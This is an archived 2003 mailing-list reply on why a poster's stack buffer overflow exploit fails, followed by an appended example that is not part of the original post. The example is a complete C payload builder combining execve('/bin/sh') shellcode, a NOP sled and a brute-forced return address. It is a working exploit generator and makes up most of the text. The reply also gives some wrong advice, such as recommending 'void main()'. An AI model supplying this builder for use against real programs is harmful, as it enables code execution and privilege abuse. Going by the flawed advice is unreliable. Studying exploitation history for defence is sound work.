Vulnerability Development mailing list archives

Re: Why this wont work


From: joe <moj0e () terra com br>
Date: Thu, 09 Oct 2003 11:00:43 -0300

Well, for various reasons...
The first being that your exploit doesn't even compile.


main (void) {
char buffer[1032]; /* 1024 + 8 */
int offset,i,ret;
char *ptr,*ptr2;


Things such as main() void when it should be void main().


help () {
fprintf ("Usage: %s <offset>\n",argv[0]);
exit(0);
}


Function declarations inside main....


for (i=0;i<strlen(buffer);i++) {
  buffer[i]=0x00;
}


Putting NULLs into shellcode is a major no-no. NULL = 0x00

Probably a couple of other reasons too.
I think _(but I'm not sure)_ that since there is no printf or something after your strcpy, you have to overwrite the .dtors section.
AND if you are using gcc > 2.95 (or something like that) it won't work.

Another thing that will help you is to overflow 100 bytes more than necessary (instead of just 8). And the last thing that I can think of... It appears to me that you are using shellcode that will run a shell. Sometimes it is necessary to use shellcode that will just execute a program instead of prompting for a shell. Also... sometimes shellcode can be specific to the computer you are running it on (because of addresses).

You might also have to brute force your return address... movl %esp,%eax might not be enough.

Have fun coding!!

Try reading "Smashing the Stack for Fun and Profit" and any other buffer overflow paper you can get hold of.

A good wargame that will help you learn to write exploits can be found at:
http://kamikaza.ffk.hr/wargame/
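The points joe raises above (no NUL bytes anywhere strcpy() will copy, overflow well past the saved return address, brute-force the return address by offset) are easiest to see in a payload builder. The following is an added example, not code from the original post or from the exploit being criticised. It uses the execve("/bin/sh") stub from "Smashing the Stack for Fun and Profit" only as sample input and never runs it; the 32-bit target buffer size (1024), the slack (100) and the base stack address 0xbffff5a0 are assumed values for illustration, and the function and constant names are the example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NOP 0x90

/* Sample input only: the execve("/bin/sh") stub from "Smashing the Stack
   for Fun and Profit". 45 bytes with no 0x00 inside (the string's NUL is
   written at run time by the code itself). Not executed here. */
static const unsigned char sh_code[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
#define SH_CODE_LEN (sizeof sh_code - 1)

/* Index of the first 0x00 byte in code[0..len), or -1 if there is none.
   strcpy() stops at the first NUL, so a NUL before the saved return
   address silently truncates the payload and the overflow never lands. */
int find_null(const unsigned char *code, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0x00)
            return (int)i;
    return -1;
}

/* Classic layout written into out[]:
       [NOP sled][shellcode][return address repeated to the end]
   total = target_buf + extra. A generous 'extra' (the post suggests ~100
   rather than 8) lets the repeated address cover the saved EIP even when
   its exact distance from the buffer is unknown. ret is a 32-bit address,
   matching the post's x86 context. Returns the payload length, or 0 if the
   sizes do not fit or the result would contain a NUL. */
size_t build_payload(unsigned char *out, size_t out_len,
                     size_t target_buf, size_t extra,
                     const unsigned char *sc, size_t sc_len, uint32_t ret)
{
    size_t total = target_buf + extra;
    unsigned char ret_le[4] = {
        (unsigned char)(ret), (unsigned char)(ret >> 8),
        (unsigned char)(ret >> 16), (unsigned char)(ret >> 24)
    };
    /* Enough 4-byte copies of ret to span the slack plus one more word. */
    size_t addr_region = ((extra + 3) / 4 + 1) * 4;

    if (total + 1 > out_len || sc_len + addr_region > total)
        return 0;
    /* Reject NULs in the shellcode and in the address bytes themselves. */
    if (find_null(sc, sc_len) >= 0 || find_null(ret_le, 4) >= 0)
        return 0;

    size_t sled = total - sc_len - addr_region;
    memset(out, NOP, sled);
    memcpy(out + sled, sc, sc_len);
    for (size_t i = 0; i < addr_region; i += 4)
        memcpy(out + sled + sc_len + i, ret_le, 4);
    out[total] = '\0';   /* terminator so the payload can be passed as a string */
    return total;
}

int main(int argc, char **argv)
{
    unsigned char payload[2048];
    /* Assumed values: 1024-byte target buffer, 100 bytes of slack, a made-up
       base address moved by the offset argument (the brute-force knob). */
    long offset = argc > 1 ? strtol(argv[1], NULL, 0) : 0;
    uint32_t ret = 0xbffff5a0u - (uint32_t)offset;
    size_t n = build_payload(payload, sizeof payload, 1024, 100,
                             sh_code, SH_CODE_LEN, ret);
    if (n == 0) {
        fprintf(stderr, "cannot build payload (NUL byte or bad sizes)\n");
        return 1;
    }
    printf("payload: %zu bytes, ret 0x%08x, first NUL at %d\n",
           n, (unsigned)ret, find_null(payload, n));
    return 0;
}
```

Run it with different offsets while the return address is being brute-forced; if a candidate address contains a 0x00 byte (for example 0xbfff0001) the builder refuses it, which is exactly the truncation the post warns about, and the same check on the shellcode catches stubs that were not written NUL-free.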

